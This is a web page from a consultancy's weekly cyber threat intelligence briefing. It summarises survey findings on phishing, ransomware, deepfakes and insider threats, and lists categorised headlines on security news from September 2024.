Government outlines plan for Cyber Security and Resilience Bill | UKAuthority
Data Protection
Opinion: How to design a US data privacy law | Ars Technica
Brits bemoan personal data practices but do little about it • The Register
Careers, Working in Cyber and Information Security
Average North American CISO salary now $565,000 • The Register
Cyber UK's quickest growing tech field, but skills gap remains | Computer Weekly
Cyber security Professionals Operate Under Increased Stress Levels - Security Boulevard
How Are We Going to Fill 4.8 Million Cyber Security Jobs? (inforisktoday.com)
Cyber security hiring slows, pros' stress levels rise - Help Net Security
Share of Women in UK Cyber Roles Now Just 17% - Infosecurity Magazine (infosecurity-magazine.com)
Law Enforcement Action and Take Downs
Russia exploited Evil Corp relationship for NATO attacks • The Register
Unmasked: The Evil Corp cyber gangster who worked for LockBit | Computer Weekly
More LockBit Hackers Arrested, Unmasked as Law Enforcement Seizes Servers - SecurityWeek
Iranian hackers charged over Trump campaign disruption | TechRadar
U.S. charges Joker's Stash and Rescator money launderers (bleepingcomputer.com)
Law enforcement arrests vacationing LockBit developer in ongoing operation | TechSpot
Cyber Crime is Still Evil Corp, But Disruptions Are Helping (inforisktoday.com)
How the FBI and Mandiant caught a 'serial hacker' who tried to fake his own death | TechCrunch
UK reveals father and son at heart of Evil Corp hacking group - BBC News
INTERPOL Arrests 8 in Major Phishing and Romance Fraud Crackdown in West Africa (thehackernews.com)
Iranian hackers charged for ‘hack-and-leak’ plot to influence election (bleepingcomputer.com)
More frequent disruption operations needed to dent ransomware gangs, officials say | CyberScoop
Telegram revealed it shared U.S. user data with law enforcement (securityaffairs.com)
Man charged for selling forged license keys for network switches (bleepingcomputer.com)
Misinformation, Disinformation and Propaganda
Intel agencies warn of Iran's ongoing phishy behavior • The Register
Iranian hackers charged over Trump campaign disruption | TechRadar
Microsoft cracks down further on Russian hackers looking to disrupt elections | TechRadar
Deepfake Ukrainian diplomat targeted US senator on Zoom call (bitdefender.com)
Iranian hackers charged for ‘hack-and-leak’ plot to influence election (bleepingcomputer.com)
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
CFOs Suit Up for Cyber War as Risk Management Evolves (pymnts.com)
Protecting Democratic Institutions from Cyber Threats - Microsoft On the Issues
Cyber Warfare and Cyber Espionage
Nation State Actors
China
Trojan cars: Why the US fears Chinese cyber attacks on electric vehicles (france24.com)
China-Linked CeranaKeeper Targeting Southeast Asia with Data Exfiltration (thehackernews.com)
Russia
Russia exploited Evil Corp relationship for NATO attacks • The Register
Multinational police effort hits sections of Lockbit ransomware operation | CyberScoop
Police arrest four suspects linked to LockBit ransomware gang (bleepingcomputer.com)
More LockBit Hackers Arrested, Unmasked as Law Enforcement Seizes Servers - SecurityWeek
Russia’s FSB protected Evil Corp gang that carried out Nato cyber-attacks (yahoo.com)
Trojan cars: Why the US fears Chinese cyber attacks on electric vehicles (france24.com)
Ukraine-Russia Cyber Battles Have Real-World Impact (darkreading.com)
Microsoft and DOJ disrupt Russian FSB hackers' attack infrastructure (bleepingcomputer.com)
Microsoft cracks down further on Russian hackers looking to disrupt elections | TechRadar
Deepfake Ukrainian diplomat targeted US senator on Zoom call (bitdefender.com)
bne IntelliNews - Russian tech startups, cyber security firms flourish amid sanctions
Russian authorities arrest nearly 100 in raids tied to cyber criminal money laundering | CyberScoop
Dutch police breached by a state actor (securityaffairs.com)
Law enforcement arrests vacationing LockBit developer in ongoing operation | TechSpot
Iran
UK on high alert over Iranian spear-phishing attacks, says NCSC | Computer Weekly
Intel agencies warn of Iran's ongoing phishy behaviour • The Register
Iranian hackers charged over Trump campaign disruption | TechRadar
Iranian hackers charged for ‘hack-and-leak’ plot to influence election (bleepingcomputer.com)
North Korea
North Korean Hackers Using New VeilShell Backdoor in Stealthy Cyber Attacks (thehackernews.com)
North Korea Profits as 'Stonefly' APT Swarms US Co's. (darkreading.com)
North Korean hackers attack Diehl Defence company - Militarnyi
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Hacktivist activity drives a rise in DDoS attacks (betanews.com)
ICE Signs $2 Million Contract With Spyware Maker Paragon Solutions | WIRED
Tools and Controls
Is the Weakest Link in Cyber Security Becoming Even Weaker? | HackerNoon
CFOs Suit Up for Cyber War as Risk Management Evolves (pymnts.com)
Cyber companies need a best practice approach to major incidents. | Computer Weekly
Allies to Leverage During a Cyber Crisis (darkreading.com)
The cyber industry needs to accept it can't eliminate risk | Computer Weekly
As CISO roles expand, so should cyber budgets, says NASCIO 2024 cyber security report | StateScoop
Over Half of Cyber Professionals Feel Their Budget is Underfunded - IT Security Guru
Five Eyes Agencies Release Guidance on Detecting Active Directory Intrusions - SecurityWeek
How to Plan and Prepare for Penetration Testing (thehackernews.com)
Session Hijacking 2.0 — The Latest Way That Attackers are Bypassing MFA (thehackernews.com)
Moving DevOps Security Out of 'the Stone Age' (darkreading.com)
Security spending signals major role change for CISOs and their teams | CSO Online
Three hard truths hindering cloud-native detection and response - Help Net Security
Forrester's CISO Budget Planning Guide for 2025: Prioritize API Security - Security Boulevard
Gartner: CISOs should ditch ‘zero tolerance’ prevention (techinformed.com)
API security maturity model to assess API security posture | TechTarget
Top 6 Cloud Security Threats to Watch Out For - Security Boulevard
JPCERT shares Windows Event Log tips to detect ransomware attacks (bleepingcomputer.com)
The Silent Epidemic: Uncovering the Dangers of Alert Fatigue and How to Overcome It (cybereason.com)
Top 5 Myths of AI & Cyber Security (darkreading.com)
How organisations can derive value from security investments and enable business growth | ITPro
How to balance your understanding of threats and how you respond to them | ITPro
Does your security strategy show continuous improvement? | ITPro
The convergence of network and security – how it helps achieve business outcomes | ITPro
Other News
The cyber industry needs to accept it can't eliminate risk | Computer Weekly
Cyber incidents are the Achilles Heel for major UK CEOs, report finds (cityam.com)
Global cyber threat to double predicts new report (emergingrisks.co.uk)
Cyber teams say they can’t keep up with attack volumes | Computer Weekly
How Snoozing on Cyber Security Fails Modern Businesses - Security Boulevard
UK man allegedly used genealogy sites to hack execs’ email accounts | Fortune
UK Post Office axes MoneyGram services in wake of cyber attack (finextra.com)
Feds say Microsoft security ‘requires an overhaul’ — but will it listen? – Computerworld
Global cyber attacks will more than double this year to 211, says QBE - Reinsurance News
Critical Infrastructure: The latest target for cyber criminals? | TechRadar
When Innovation Outpaces Financial Services Cyber Security - Security Boulevard
Securing Space in the Age of Advanced Cyber Threats (eetimes.eu)
Schools reminded to maintain cyber hygiene by Ofqual | Education Business (educationbusinessuk.net)
America's policy in cyber space is about persistence, not deterrence (cyberscoop.com)
One-Third of UK Teachers Do Not Have Cyber Security Training (techrepublic.com)
Global Cyber Security Agencies Release OT Security Guidelines (inforisktoday.com)
Vulnerability Management
Could Security Misconfigurations Top OWASP List? (darkreading.com)
What are zero-day vulnerabilities? | TechRadar
NVD still backlogged with 17K+ unprocessed bugs • The Register
Systems used by courts and governments across the US riddled with vulnerabilities | Ars Technica
Vulnerabilities
Thousands of Adobe Commerce e-stores hacked by exploiting CosmicSting bug (securityaffairs.com)
Worried about that critical RCE Linux bug? Here's why you can relax | ZDNET
Ivanti Endpoint Manager Flaw Actively Targeted, CISA Warns Agencies to Patch (thehackernews.com)
Progress Software Releases Patches for 6 Flaws in WhatsUp Gold – Patch Now (thehackernews.com)
New Chrome Security Warning For 3 Billion Windows, Mac, Linux, Android Users (forbes.com)
Rackspace systems hit by zero-day exploit of third-party app • The Register
Organisations Warned of Exploited SAP, Gpac and D-Link Vulnerabilities - SecurityWeek
Zimbra RCE Vuln Under Attack Needs Immediate Patching (darkreading.com)
700K+ DrayTek routers are sitting ducks on the internet • The Register
Critical flaw in NVIDIA Container Toolkit allows full host takeover (bleepingcomputer.com)
Microsoft fixes Windows KB5043145 reboot loops, USB and Bluetooth issues (bleepingcomputer.com)
VLC Player Vulnerability Let Attackers Execute Malicious Code (cybersecuritynews.com)
Arc browser adds security bulletins and bug bounties - The Verge
The fix for BGP’s weaknesses – RPKI – has issues of its own • The Register
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Briefing 27 September 2024
Black Arrow Cyber Threat Intelligence Briefing 27 September 2024:
-Cyber Threats Top the 2024 Travelers Risk Index, Fourth Time in Six Years
-Preparing for the Cyber Security and Fraud Risks of Deepfakes: What Executive Teams Need to Know
-Organisation Data on Dark Web Increases Cyber Attack Risk: Marsh McLennan
-84 Percent of Enterprises Suffered Security Incidents in the Last Year
-It's Estimated That 91% of Cyber Attacks Begin with Phishing Emails
-82% of Phishing Sites Now Target Mobile Devices
-UK Firms Are Dangerously Overconfident About Paying Ransoms to Cyber Criminals
-Preparing To Fail is a Vital Part of Cyber Security
-Over a Third of Employees Secretly Sharing Work Info with AI
-Fortifying the Weakest Link: How to Safeguard Against Supply Chain Cyber Attacks
-Underfunding and Leadership Gaps Weaken Cyber Security Defences
-Racist Network Rail Wi-Fi Hack was Work of Malicious Insider
Welcome to this week’s Black Arrow Cyber Threat Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Top Cyber Stories of the Last Week
Cyber Threats Top the 2024 Travelers Risk Index, Fourth Time in Six Years
The 2024 Travelers Risk Index shows cyber threats as the top concern for 62% of businesses, surpassing medical cost inflation, employee benefits costs, and economic uncertainty (all at 59%). Despite increased awareness, 30% of over 1,200 respondents lack cyber insurance, though coverage rose to 65% from 60% last year. Cyber incidents rose for the eighth time in nine years, with 24% experiencing breaches. Key concerns include security breaches (57%), ransomware (54%), unsafe employee practices (53%), and system glitches (53%).
Preparing for the Cyber Security and Fraud Risks of Deepfakes: What Executive Teams Need to Know
Reports from the US National Security Agency, the Cybersecurity and Infrastructure Security Agency, and the FBI highlight deepfake technology as a major concern due to the availability of AI tools. Deepfakes can replicate voices and likenesses, making impersonations undetectable. One company lost $25 million to deepfake fraud. Organisations are advised to implement response plans and detection technologies as they become more available, as well as shared phrases to validate identity, but many lack comprehensive strategies, leaving them vulnerable to deepfake-enabled fraud and reputational damage.
Organisation Data on Dark Web Increases Cyber Attack Risk: Marsh McLennan
Searchlight Cyber and the Marsh McLennan Cyber Risk Intelligence Center have found that the presence of any data related to an organisation on the dark web significantly increases the risk of cyber attacks. Despite this, many organisations lack visibility into their dark web exposure. The report emphasises that proactively monitoring the dark web can enable organisations to adjust their defences and effectively stop attacks before they occur.
84 Percent of Enterprises Suffered Security Incidents in the Last Year
Netwrix research shows 84% of enterprises experienced cyber attacks in the past year, up from 65% in 2023. AI automation increases attack frequency and sophistication. Over half of large organisations faced unexpected expenses to fix security gaps. Additionally, 22% faced compliance fines, and 21% suffered reduced competitive edge. Nearly 30% estimate financial damage from cyber threats of at least $50,000.
It's Estimated That 91% of Cyber Attacks Begin with Phishing Emails
Phishing emails cause significant disruption, with 91% of cyber attacks starting this way. Larger companies are vulnerable to lateral phishing (from internal compromised email accounts), while smaller businesses face frequent external phishing and extortion schemes. Smaller businesses experience nearly three times more extortion attacks than larger firms. Many organisations lack tailored security measures to combat evolving email risks, highlighting the need to prioritise email security.
82% of Phishing Sites Now Target Mobile Devices
Zimperium’s 2024 zLabs Global Mobile Threat Report finds 82% of phishing sites target mobile devices, with 76% using HTTPS to appear secure. Unique malware samples increased by 13% year-on-year, with riskware and trojans making up 80% of threats. Healthcare is the most affected industry, with 39% of mobile threats from phishing. Sideloaded apps (installed on a device through unofficial means, bypassing the standard app store) pose significant risks, especially in financial services where 68% of threats are linked to them. Advanced security solutions are essential to protect mobile endpoints.
UK Firms Are Dangerously Overconfident About Paying Ransoms to Cyber Criminals
Cohesity found that ransomware is a top concern for UK organisations, with over half experiencing attacks in 2023. Three-quarters would pay a ransom to recover data, despite only 4% fully recovering after payment. Costs averaged £870,000 per incident, with some reaching £20 million. Fewer than 2% restored operations within 24 hours, and one in five took up to two months. This highlights the need for resilience and robust recovery processes over ransom payments.
Preparing To Fail is a Vital Part of Cyber Security
The UK Government reports that 50% of businesses suffered cyber attacks in 2023. The Synnovis ransomware attack disrupted NHS services, highlighting unpreparedness for worst-case scenarios including when organisations rely on other organisations in their supply chain. Few organisations plan for high-impact risks or supply chain attacks. The report stresses the need for pre-assigned roles and responsibilities to ensure swift remediation. Preparing for the most damaging incidents is essential for organisational survival.
Over a Third of Employees Secretly Sharing Work Info with AI
CybSafe and the National Cyber Security Alliance found that employees sharing sensitive work information with AI tools without permission is a major concern. This behaviour is prevalent among Gen Z (46%) and millennials (43%). Despite awareness of AI risks, over half of employees lack training on safe AI use. Two-thirds of survey respondents worry AI will make scams harder to detect and increase cyber crime. Trust in companies’ AI implementation is low, with 35% expressing low trust. Organisations need training and robust policies to mitigate AI-related risks.
Fortifying the Weakest Link: How to Safeguard Against Supply Chain Cyber Attacks
Recent incidents have highlighted that vulnerabilities in widely-used IT and security tools are a top concern for organisations, with supply chain cyber attacks rising significantly between 2022 and 2023. Despite strengthening direct network defences, many organisations have yet to safeguard against third-party control failures. Key strategies include advanced supplier risk management, securing the software development pipeline, and implementing strong access controls. Adopting frameworks like the NIST cyber security framework and incorporating cyber security requirements into vendor contracts are essential. Without proactive measures, organisations remain vulnerable to significant reputational and operational damage from supply chain cyber attacks.
Underfunding and Leadership Gaps Weaken Cyber Security Defences
Trend Micro found that cyber security threats are the top concern for organisations, but many lack strategic leadership and investment. With 96% of IT leaders worried about the expanding attack surface, the report noted that despite blocking 161 billion threats in 2023, —a 10% increase from the previous year—nearly half of respondents said their leadership did not consider cyber security their responsibility. Only 36% can afford 24/7 coverage, leading to fragmented approaches. Over half believe their organisation’s attitude towards cyber security varies monthly, highlighting inconsistency in risk management. Cyber security is a boardroom issue, and neglecting it could have disastrous consequences.
Racist Network Rail Wi-Fi Hack was Work of Malicious Insider
A cyber attack on public Wi-Fi at 19 UK railway stations on 25 September blocked passengers from accessing the service, receiving racist and Islamophobic messages instead. The British Transport Police arrested an employee of GlobalReach Technology, the Wi-Fi provider, for suspected involvement. Although no personal data was compromised, the incident underscores the significant risks posed by malicious insiders. Telent, responsible for the network, aims to restore services by the weekend. This event highlights the need for robust insider threat mitigation strategies.
Sources:
https://www.jdsupra.com/legalnews/preparing-for-the-cybersecurity-and-3002248/
https://hackernoon.com/its-estimated-that-91percent-of-cyber-attacks-begin-with-phishing-emails
https://www.infosecurity-magazine.com/news/82-phishing-target-mobile-devices/
https://www.infosecurity-magazine.com/news/third-employees-sharing-work-info/
https://informationsecuritybuzz.com/underfunding-and-leadership-gaps-weaken-cybersecurity-defenses/
Governance, Risk and Compliance
84 percent of enterprises suffered security incidents in the last year (betanews.com)
AI threats pushing cyber pros to seek legal safeguards | Cybernews
Preparing to fail is a vital part of cyber security - Ian McGowan (scotsman.com)
AI Adoption Set to Unravel Years of Cyber Resilience - IT Security Guru
Brands are changing cyber security strategies due to AI threats (securityintelligence.com)
Underfunding And Leadership Gaps Weaken Cyber Security Defences (informationsecuritybuzz.com)
How Cyber-Risk & Business Risk Are the Same (darkreading.com)
Cyber threats top the 2024 Travelers Risk Index, fourth time in six years - Reinsurance News
New cyber security advisory highlights defence-in-depth strategies (securityintelligence.com)
How cyber compliance helps minimize the risk of ransomware infections - Help Net Security
What to do - and not to do - when you suffer a cyber-attack (businesscloud.co.uk)
Reporting cyber security posture and systemic risk to the board | CIO
How to give cyber security the priority treatment it deserves (moneymarketing.co.uk)
Balancing Risk and Innovation - A CISO Perspective | Security Magazine
Digital security is everyone's concern – Daily Business Magazine (dailybusinessgroup.co.uk)
Are You Sabotaging Your Cyber Security Posture? - Security Boulevard
Round-the-Clock Cyber Coverage Lacking in Many Orgs | MSSP Alert
Threats
Ransomware, Extortion and Destructive Attacks
Companies Often Pay Ransomware Attackers Multiple Times - Security Boulevard
Cyber security experts urge a stronger security posture in response to AI attacks - SiliconANGLE
ENISA Warns About Hacktivist, Ransomware Crossover (databreachtoday.co.uk)
UK firms are dangerously overconfident about paying ransoms to cyber criminals | ITPro
MFA bypass becomes a critical security issue as ransomware tactics advance - Help Net Security
Ransomware Task Force finds 73% attack increase in 2023 | TechTarget
How cyber compliance helps minimize the risk of ransomware infections - Help Net Security
Warnings After New Valencia Ransomware Group Strikes Businesses and Leaks Data | Tripwire
Two-Thirds of Healthcare Organisations Hit by Ransomware – (globenewswire.com)
Ransomware Victims
ICO Fine Software Provider £6M Following Ransomware Attack (nelsonslaw.co.uk)
Two-Thirds of Healthcare Organisations Hit by Ransomware – (globenewswire.com)
Cyber attack could cost Western Isles council more than £1m - BBC News
Lancaster Royal Grammar targeted by cyber ransom hackers - BBC News
AutoCanada says ransomware attack "may" impact employee data (bleepingcomputer.com)
US government agency confirms it was hit by major ransomware attack | TechRadar
Delaware Libraries confirms RansomHub cyber attack • The Register
Phishing & Email Based Attacks
It's Estimated That 91% Of Cyber Attacks Begin With Phishing Emails | HackerNoon
Phishing and deepfakes are leading AI-powered threats (betanews.com)
82% of Phishing Sites Now Target Mobile Devices - Infosecurity Magazine (infosecurity-magazine.com)
Enterprises suffer surge in mobile phishing attacks (betanews.com)
Europol Shuts Down Major Phishing Scheme Targeting Mobile Phone Credentials (thehackernews.com)
This Phishing Service Helped Criminals Break Into 1 Million+ Stolen Phones (pcmag.com)
Marko Polo hackers found to be running dozens of scams | SC Media (scmagazine.com)
One quarter of small business owners have been targeted by AI-driven scams (prnewswire.com)
75% of organisations say phishing poses the greatest AI risk | Security Magazine
Microsoft 365 Credentials Targeted by TikTok URL-Based Phishing | MSSP Alert
Other Social Engineering
Beware: fraud and smishing scams targeting students | Bournemouth University
US indicts two over socially engineered $230M+ crypto heist • The Register
How to Stop Getting Spam Calls? This Expert Weighs In. (dailydot.com)
Artificial Intelligence
These Are Cyber Chiefs' Biggest Fears About AI (investopedia.com)
Phishing and deepfakes are leading AI-powered threats (betanews.com)
AI threats pushing cyber pros to seek legal safeguards | Cybernews
AI Adoption Set to Unravel Years of Cyber Resilience - IT Security Guru
Brands are changing cybersecurity strategies due to AI threats (securityintelligence.com)
Less Than Half of AI Users Trained on Security and (globenewswire.com)
HackerOne: 48% of Security Professionals Believe AI Is Risky (techrepublic.com)
Hackers deploy AI-written malware in targeted attacks (bleepingcomputer.com)
One quarter of small business owners have been targeted by AI-driven scams (prnewswire.com)
Hacker plants false memories in ChatGPT to steal user data in perpetuity | Ars Technica
Are new gen AI tools putting your business at additional risk? (securityintelligence.com)
SANS Institute: Top 5 dangerous cyber attack techniques in 2024 (securityintelligence.com)
LinkedIn Halts AI Data Processing in UK Amid Privacy Concerns Raised by ICO (thehackernews.com)
Police are using AI to write crime reports. What could go wrong? | ZDNET
2FA/MFA
MFA bypass becomes a critical security issue as ransomware tactics advance - Help Net Security
New Chrome Alert After Hackers Claim 2FA Security Cracked In 10 Minutes (forbes.com)
Malware
AI’s Influence on Malware Attacks Tops IT Pros’ Concerns | MSSP Alert
Unique malware sample volumes seen surging | Computer Weekly
New MacOS Malware Let Attackers Control The Device Remotely (cybersecuritynews.com)
HP Spots a Malware Attack That Was Likely Built With Generative AI (pcmag.com)
RomCom Malware Resurfaces With SnipBot Variant (darkreading.com)
Infostealer malware bypasses Chrome’s new cookie-theft defences (bleepingcomputer.com)
This Windows malware is now evolving to target Linux systems | TechRadar
Move over, Cobalt Strike, there's a new post-exploit tool • The Register
Global infostealer malware operation targets crypto users, gamers (bleepingcomputer.com)
New PondRAT Malware Hidden in Python Packages Targets Software Developers (thehackernews.com)
Russia clings to malware as attacks on Ukraine persist • The Register
Bots/Botnets
65% of websites are unprotected against simple bot attacks - Help Net Security
Mobile
82% of Phishing Sites Now Target Mobile Devices - Infosecurity Magazine (infosecurity-magazine.com)
Mobile Phishing Attacks Targeting Enterprises Surge, Zimperium Researchers Find (prnewswire.com)
The NSA advises you to turn off your phone once a week - here's why | ZDNET
Europol Shuts Down Major Phishing Scheme Targeting Mobile Phone Credentials (thehackernews.com)
New Octo Android malware version impersonates NordVPN, Google Chrome (bleepingcomputer.com)
This Phishing Service Helped Criminals Break Into 1 Million+ Stolen Phones (pcmag.com)
New Android banking trojan Octo2 targets European banks (securityaffairs.com)
Victims lose $70k to Play Store wallet-draining app • The Register
Opinion | Israel’s Pager Attacks Have Changed the World - The New York Times (nytimes.com)
How Digital Forensics Experts Read Your Encrypted WhatsApp Messages (forbes.com)
Denial of Service/DoS/DDoS
DDoS overtakes ransomware as most active cyber threat in Europe | Cybernews
Austria subjected to pro-Russian DDoS intrusions | SC Media (scworld.com)
Internet of Things – IoT
3 tips for securing IoT devices in a connected world - Help Net Security
Hacking Kia cars made after 2013 using just their license plate (securityaffairs.com)
Data Breaches/Leaks
TfL sends letters to 5,000 cyber attack customers whose details were hacked | Evening Standard
'Harvest now, decrypt later': Why hackers are waiting for quantum computing | VentureBeat
Dell's Security Woes Deepen: Attackers Strike Twice In One Week (informationsecuritybuzz.com)
Harvey Nichols confirms cyber attack, says customer data leaked | TechRadar
Twilio Call Data Exposed | MSSP Alert
Over 90 million French records exposed: mysterious data hoarder leaves instances open | Cybernews
Data of 3,191 congressional staffers leaked in the dark web (securityaffairs.com)
Threat Actor IntelBroker Allegedly Claims Leak of Deloitte Data (cybersecuritynews.com)
US Capitol Hit by Massive Dark Web Cyber Attack - Newsweek
Hacker uses Telegram chatbots to leak data - Security - iTnews
AutoCanada says ransomware attack "may" impact employee data (bleepingcomputer.com)
Organised Crime & Criminal Actors
ENISA Warns About Hacktivist, Ransomware Crossover (databreachtoday.co.uk)
Why so many hackers are Russian | Cybernews
Why so many hackers are Russian: Vol 2 | Cybernews
Life imitates xkcd comic as Florida gang beats crypto password from retiree | Ars Technica
Cybersecurity Experts Closing in on Ticketmaster Hacker (digitalmusicnews.com)
Risk & Repeat: What's next for Telegram and Pavel Durov? | TechTarget
Telegram CEO Pavel Durov will hand over data to government (nypost.com)
Shocking poll: Half the world has fallen victim to cyber attacks (studyfinds.org)
Why Russia is a Hotbed of Cyber Crime | Intel471
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Life imitates xkcd comic as Florida gang beats crypto password from retiree | Ars Technica
Hackers stole over $44 million from Asian crypto platform BingX (securityaffairs.com)
Marko Polo hackers found to be running dozens of scams | SC Media (scmagazine.com)
An official OpenAI X account just got hacked by crypto scammers | Mashable
US indicts two over socially engineered $230M+ crypto heist • The Register
Global infostealer malware operation targets crypto users, gamers (bleepingcomputer.com)
Insider Risk and Insider Threats
Racist Network Rail Wi-Fi hack was work of malicious insider | Computer Weekly
Mandiant gives tips on catching North Korean IT operatives • The Register
The Importance of Cyber Security Awareness and Insider Threat Management - Security Boulevard
Why insider threats are cyber security’s next big challenge - Hindustan Times
Insurance
Cyber insurance price hikes stabilize as insurers expect more from CISOs | CSO Online
The surge in cyber insurance and what it means for your business - Help Net Security
Cyber Insurers Owe Millions for Attack, Transcription Firm Says (bloomberglaw.com)
Supply Chain and Third Parties
China's 'Salt Typhoon' Cooks Up Cyber Attacks on US ISPs (darkreading.com)
Cyber security: Remember, We Are All Connected (epsnews.com)
Evaluating embedded vulnerabilities and cyber security risks in procurement | TechRadar
CrowdStrike to Congress: 'Perfect storm' led to IT outage • The Register
Fortifying the Weakest Link: How to Safeguard Against Supply Chain Cyber Attacks - SecurityWeek
Cloud/SaaS
AWS says customers are turning back to on-prem | TechRadar
Microsoft Trims Cloud Cyber Attack Surface (darkreading.com)
Microsoft 365 Credentials Targeted by TikTok URL-Based Phishing | MSSP Alert
Ivanti's Cloud Service Attacked via Second Vuln (darkreading.com)
Outages
'Cyber security issue' blamed for MoneyGram's ongoing outage • The Register
CrowdStrike exec to apologize for faulty update that caused global IT outage (yahoo.com)
CrowdStrike to Congress: 'Perfect storm' led to IT outage • The Register
Identity and Access Management
Securing non-human identities: Why fragmented strategies fail - Help Net Security
Active Directory compromise: Cyber security agencies provide guidance - Help Net Security
Encryption
How to prepare for post-quantum computing security | TechTarget
'Harvest now, decrypt later': Why hackers are waiting for quantum computing | VentureBeat
G7 Cyber Expert Group warns financial sector of quantum computing | SC Media (scworld.com)
How Digital Forensics Experts Read Your Encrypted WhatsApp Messages (forbes.com)
Linux and Open Source
Doomsday 9.9 unauthenticated RCE bug affects 'all Linux' • The Register
Printer bug sends researchers into uproar, affects major Linux distros | CyberScoop
This Windows malware is now evolving to target Linux systems | TechRadar
New Mallox ransomware Linux variant based on leaked Kryptina code (bleepingcomputer.com)
Paid open-source maintainers spend more time on security - Help Net Security
FreeBSD Hypervisor Vulnerability Lets Attackers Execute Malicious Code (cybersecuritynews.com)
Passwords, Credential Stuffing & Brute Force Attacks
Why You Need a Longer Password (howtogeek.com)
Public Sector Compliance: Passwords and Credentials Matter - Security Boulevard
Social Media
Microsoft 365 Credentials Targeted by TikTok URL-Based Phishing | MSSP Alert
An official OpenAI X account just got hacked by crypto scammers | Mashable
LinkedIn Halts AI Data Processing in UK Amid Privacy Concerns Raised by ICO (thehackernews.com)
42% of daily X users have a negative view of it - losing the block feature won't help | ZDNET
X's first transparency report since Musk reveals a surprising contradiction | ZDNET
Malvertising
Training, Education and Awareness
STUDY: Less Than Half of AI Users Trained on Security and (globenewswire.com)
Combating phishing attacks through awareness and simulation | Cybernews
The Importance of Cyber Security Awareness and Insider Threat Management - Security Boulevard
Regulations, Fines and Legislation
ICO Fine Software Provider £6M Following Ransomware Attack (nelsonslaw.co.uk)
Rethinking the United Nations Cybercrime Treaty (justsecurity.org)
Cyber Security | UK Regulatory Outlook September 2024 - Osborne Clarke | Osborne Clarke
UK government's bank data sharing plan blasted by critics • The Register
Models, Frameworks and Standards
New NIST program focuses on AI cyber security and privacy | SC Media (scmagazine.com)
Backup and Recovery
Isolated Cyber Vaults: The last line of defence against billions of attacks | TechRadar
Data Protection
LinkedIn Halts AI Data Processing in UK Amid Privacy Concerns Raised by ICO (thehackernews.com)
Careers, Working in Cyber and Information Security
It’s Never Too Late: Transitioning to a Career in Cyber Security - IT Security Guru
Future-proofing cyber security: Why talent development is key - Help Net Security
Round-the-Clock Cyber Coverage Lacking in Many Orgs | MSSP Alert
Law Enforcement Action and Take Downs
Europol Shuts Down Major Phishing Scheme Targeting Mobile Phone Credentials (thehackernews.com)
This Phishing Service Helped Criminals Break Into 1 Million+ Stolen Phones (pcmag.com)
Telegram Agrees to Share User Data with Authorities for Criminal Investigations (thehackernews.com)
US indicts two over socially engineered $230M+ crypto heist • The Register
Risk & Repeat: What's next for Telegram and Pavel Durov? | TechTarget
Telegram CEO Pavel Durov will hand over data to government (nypost.com)
FBI raids government IT and cyber contractor Carahsoft - Nextgov/FCW
Misinformation, Disinformation and Propaganda
Fake UK news sites ‘spreading false stories’ about western firms in Ukraine | Russia | The Guardian
How Russia, China & Iran Are Targeting US Elections (darkreading.com)
China are the real hackers not us, Taiwan says after cyber accusations, Asia News - AsiaOne
Iranian-linked election interference operation shows signs of recent access | CyberScoop
Officials: Fake Kamala Harris Videos Part of Russian Influence Operations | MSSP Alert
China urges vigilance against Taiwanese cyber attacks - CNA (channelnewsasia.com)
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Developing an effective cyber warfare response plan - Help Net Security
Volt Typhoon: The real end game of evolving nation-state threats - SiliconANGLE
The Supply Chain Conspiracy: Cyber Attacks Behind the Lebanon Explosions - Security Boulevard
Nation State Actors
Bulk of data centre cyber attacks coming from hostile states, warn EU experts (irishexaminer.com)
How Russia, China & Iran Are Targeting US Elections (darkreading.com)
China
US ISPs targeted by new Chinese cyber espionage gang | SC Media (scworld.com)
China's Salt Typhoon cyber spies spotted deep inside US ISPs • The Register
Chinese hackers allegedly hacked US ISPs for cyber espionage | CSO Online
Noise Storms: Massive Amounts of Spoofed Web Traffic Linked to China - SecurityWeek
China's 'Salt Typhoon' Cooks Up Cyber Attacks on US ISPs (darkreading.com)
Chinese APT Earth Baxia target APAC by exploiting GeoServer flaw (securityaffairs.com)
Noise Storms: Mysterious massive waves of spoofed traffic observed since 2020 (securityaffairs.com)
China are the real hackers not us, Taiwan says after cyber accusations, Asia News - AsiaOne
China urges vigilance against Taiwanese cyber attacks - CNA (channelnewsasia.com)
Russia
Fake UK news sites ‘spreading false stories’ about western firms in Ukraine | Russia | The Guardian
Russia-backed Gamaredon still ‘most engaged’ hacker group in Ukraine (therecord.media)
Ukraine sees shift in Russian hacking tactics: more widespread, less severe | Cybernews
Officials: Fake Kamala Harris Videos Part of Russian Influence Operations | MSSP Alert
Why so many hackers are Russian | Cybernews
Why so many hackers are Russian: Vol 2 | Cybernews
Russia clings to malware as attacks on Ukraine persist • The Register
Why Russia is a Hotbed of Cyber Crime | Intel471
Hacktivist Group Twelve Targets Russian Entities with Destructive Cyber Attacks (thehackernews.com)
Kaspersky deletes itself, installs UltraAV antivirus without warning (bleepingcomputer.com)
Austria subjected to pro-Russian DDoS intrusions | SC Media (scworld.com)
Iran
